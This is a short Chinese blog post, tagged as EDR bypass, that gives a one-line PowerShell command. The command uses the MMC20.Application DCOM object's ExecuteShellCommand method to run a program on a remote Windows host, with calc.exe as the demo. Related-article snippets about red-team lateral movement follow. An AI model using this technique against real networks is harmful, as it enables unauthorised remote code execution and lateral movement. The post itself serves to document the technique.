使用DCOM对象的ExecuteShellCommand方法执行系统命令

最新推荐文章于 2022-11-21 18:03:37 发布

原创最新推荐文章于 2022-11-21 18:03:37 发布 · 1.2k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#ExecuteShellCommand #白利用 #DCOM #Bypass EDR

心情杂货铺专栏收录该内容

47 篇文章

订阅专栏

本文介绍了一种使用MMC20.Application对象从远程位置执行命令的方法，通过创建实例并调用ExecuteShellCommand方法来运行指定的程序。这种方法可用于实现远程操作或自动化任务。

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","这里替换成你的IP")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")

效果：
在这里插入图片描述

参考链接：https://hausec.com/2019/08/12/offensive-lateral-movement/

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FFE4

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Android-ExecuteShell是一个可以方便的执行shell命令的Android开源库

08-13

ExecuteShell 是一个可以让你在你的 Android 项目上方便快速使用 shell 指令的开源库

[横向移动] DCOM 远程命令执行横向移动

最新发布

Blue17 の小窝

03-21

1131

DcomExec 是 Impacket 工具包中的一个工具，属于是对前面介绍的各种 DCOM 横向移动命令的一个封装，运行工具，提供必要的参数后，它会依次遍历可能可用的 DCOM 接口，然后实现横向移动。虽然前面列举了一堆的 DCOM，但实际上能建立连接进行横向移动的是少之又少，本章笔者就介绍几个常用的，以及其对应的执行远程命令的方法。使用 DCOM 进行横向移动的优势之一，就是在远程主机上执行的进程将会是托管 COM 服务器的软件。（最好还是 Administrator 级别的，一般管理员可能还不太够）

参与评论您还未登录，请先登录后发表或查看评论

ShellCommand命令执行器

Qt君

01-10

1720

基于Qt写的shell命令执行器

java执行shell/CMD命令

大仕忆的博客

11-21

607

java执行shell

How To Execute Shell Command From Java

02-27

1217

In Java, you can use Runtime.getRuntime().exec to execute external shell command : p = Runtime.getRuntime().exec("host -t a " + domain); p.waitFor(); BufferedReader reader =

adb操作指令

门小远的博客

10-16

709

adb install hz.apk (-r 覆盖安装，-d 降级安装 -s 安装到sd卡) adb uninstall com.htinns (-k 卸载但不删除数据） adb install-multiple 批量安装 adb pull adb push adb start-server/kill-server 启动/关闭adb服务 adb get-state

横向远程命令执行——DCOM

SheXinK’s Blog

12-30

2417

横向远程命令执行——DCOM1、测试环境 DCOM（分布式组件对象模型,分布式组件对象模式）是一系列微软的概念和程序接口，利用这个接口，客户端程序对象能够请求来自网络中另一台计算机上的服务器程序对象。DCOM基于组件对象模型（COM），COM提供了一套允许同一台计算机上的客户端和服务器之间进行通信的接口（运行在Windows95或者其后的版本上）。此篇文章学习自3gstudent 域渗...

内网环境下的横向移动总结

hongduilanjun的博客

07-21

3023

前言在内网渗透中，当攻击者获取到内网某台机器的控制权后，会以被攻陷的主机为跳板，通过收集域内凭证等各种方法，访问域内其他机器，进一步扩大资产范围。通过此类手段，攻击者最终可能获得域控制器的访问权限，甚至完全控制基于Windows操作系统的整个内网环境，控制域环境下的全部机器。横向移动，是攻击者侵入企业系统时，获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护网络安全。...

内网渗透-内网环境下的横向移动总结

lza20001103的博客

08-19

2311

内网环境下的横向移动总结

红队技巧-常规横向手法

Gamma_lab的博客

06-29

1151

前言域内横向移动技术是红队作战在域内最基本技术之一，红队人员会利用该技术，以被攻陷的系统为跳板，通过已经收集的凭据和密码，来访问域内其他主机，扩大战果，最终目的是获取到dc的访问控制权限。实操 1.ICP Ipc（共享命名管道），其作用是为了实现进程间通信而开放的命名管道。ipc可以通过用户名和密码建立ipc链接，获取相应的用户权限。目标机应开放139和445端口，以支持实现远程登陆和默认共享资源的访问首先需要在跳板机和目标机建立ipc连接 #建立ipc连接 net use \\192.168.75

【Linux】Linux程序中通过popen执行shell命令并获取执行结果

Daniel Leng的博客

11-03

2654

linux程序中执行shell命令的方式有很多种，譬如：system、exec族函数、popen。这里演示使用popen来执行ping命令，并获取执行结果。

Android shell command execute Demo

weixin_33785108的博客

07-01

396

1 package com.android.utils; 2 3 4 import java.io.File; 5 6 import java.io.IOException; 7 import java.io.InputStream; 8 import java.util.ArrayList; 9 import java.util.Li...

在UiAutomator里启动和关闭应用

whatnamecaniuse的专栏

09-06

9721

1、am法 UiDevice里有一个方法是executeShellCommand，我们可以用命令行的am start -n 包名/Activity名来启动应用。 getUiDevice().executeShellCommand("am start -n 包名/Activity名"); 同理，可以用 am force-stop 包名来关闭应用。 getUiDevice().e

用ShellExecute执行cmd命令遇到的问题总结

helinsen的专栏

01-05

1万+

1、如果命令中的路径包含空格，要把路径去掉头尾用双引号包含起来。例：strPath = “”D:\\\"te st\\\"test.exe；（用“\”进行字符转义） 2、用变量传命令的时候，要在命令字符开始加上"/c"，不然命令不会执行。例：strCommand = "/c " + "date"; ShellExecute(NULL, "open", "

shell command命令